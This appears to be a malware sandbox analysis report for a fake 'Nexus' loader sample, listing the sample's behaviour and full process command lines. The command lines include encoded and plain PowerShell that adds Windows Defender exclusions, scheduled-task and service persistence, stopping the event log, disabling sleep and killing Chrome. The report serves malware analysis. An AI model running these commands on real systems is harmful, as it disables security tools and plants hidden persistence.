Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ekpzom.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ekpzom.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ekpzom.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ekpzom.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ekpzom.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ekpzom.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ekpzom.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ekpzom.exe N/A
N/A N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe N/A
N/A N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe N/A
N/A N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe N/A
N/A N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe N/A
N/A N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe N/A
N/A N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5068 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5068 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5068 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5068 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5068 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5068 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5068 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 5068 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 5068 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe C:\Users\Admin\AppData\Local\Temp\Nexus Loader.exe
PID 5068 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe C:\Users\Admin\AppData\Local\Temp\Nexus Loader.exe
PID 1840 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Loader.exe C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe
PID 1840 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\Nexus Loader.exe C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe
PID 1384 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 212 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 212 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Windows\System32\schtasks.exe
PID 1384 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Windows\System32\schtasks.exe
PID 1384 wrote to memory of 916 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Users\Admin\AppData\Local\Temp\ekpzom.exe
PID 1384 wrote to memory of 916 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Users\Admin\AppData\Local\Temp\ekpzom.exe
PID 2632 wrote to memory of 4248 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\conhost.exe
PID 2632 wrote to memory of 4248 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\conhost.exe
PID 2632 wrote to memory of 4248 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\conhost.exe
PID 2632 wrote to memory of 4248 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\conhost.exe
PID 2632 wrote to memory of 4248 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\conhost.exe
PID 2632 wrote to memory of 4248 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\conhost.exe
PID 2632 wrote to memory of 4248 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\conhost.exe
PID 2632 wrote to memory of 4248 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\conhost.exe
PID 2632 wrote to memory of 4248 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\conhost.exe
PID 2632 wrote to memory of 5064 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\svchost.exe
PID 2632 wrote to memory of 5064 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\svchost.exe
PID 2632 wrote to memory of 5064 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\svchost.exe
PID 2632 wrote to memory of 5064 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\svchost.exe
PID 2632 wrote to memory of 5064 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\svchost.exe
PID 1384 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Users\Admin\AppData\Local\Temp\sowzuw.exe
PID 1384 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Roaming\dllhost.exe C:\Users\Admin\AppData\Local\Temp\sowzuw.exe
PID 2264 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\sowzuw.exe C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe
PID 2264 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\sowzuw.exe C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe
PID 4800 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 4800 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 4800 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 4800 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 3388 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3388 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4800 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 4800 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 704 wrote to memory of 3376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 704 wrote to memory of 3376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4800 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 4800 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 2632 wrote to memory of 32 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2632 wrote to memory of 32 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4800 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 4800 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 2164 wrote to memory of 3408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2164 wrote to memory of 3408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4800 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 4800 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 2952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1468 wrote to memory of 2952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe

"C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZABrACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHMAdABtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBuAGUAeAB1AHMAbABvAGEAZABlAHIAIABSAHUAbgAgAEEAcwAgAEEAZABtAGkAbgAgAEkAZgAgAEkAbgBqAGUAYwB0AGkAbwBuACAARgBhAGkAbABzACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAeQBmAGIAIwA+AA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AeAB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AZABhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZQByACMAPgA="

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Users\Admin\AppData\Local\Temp\Nexus Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Nexus Loader.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe

"C:\Users\Admin\AppData\Local\Temp\Nexus Loader.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"

C:\Users\Admin\AppData\Local\Temp\ekpzom.exe

"C:\Users\Admin\AppData\Local\Temp\ekpzom.exe"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "HDNFMUHS"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "HDNFMUHS" binpath= "C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "HDNFMUHS"

C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe

C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\svchost.exe

svchost.exe

C:\ProgramData\Windows Runtime.exe

"C:\ProgramData\Windows Runtime.exe"

C:\Users\Admin\AppData\Local\Temp\sowzuw.exe

"C:\Users\Admin\AppData\Local\Temp\sowzuw.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe

"C:\Users\Admin\AppData\Local\Temp\sowzuw.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

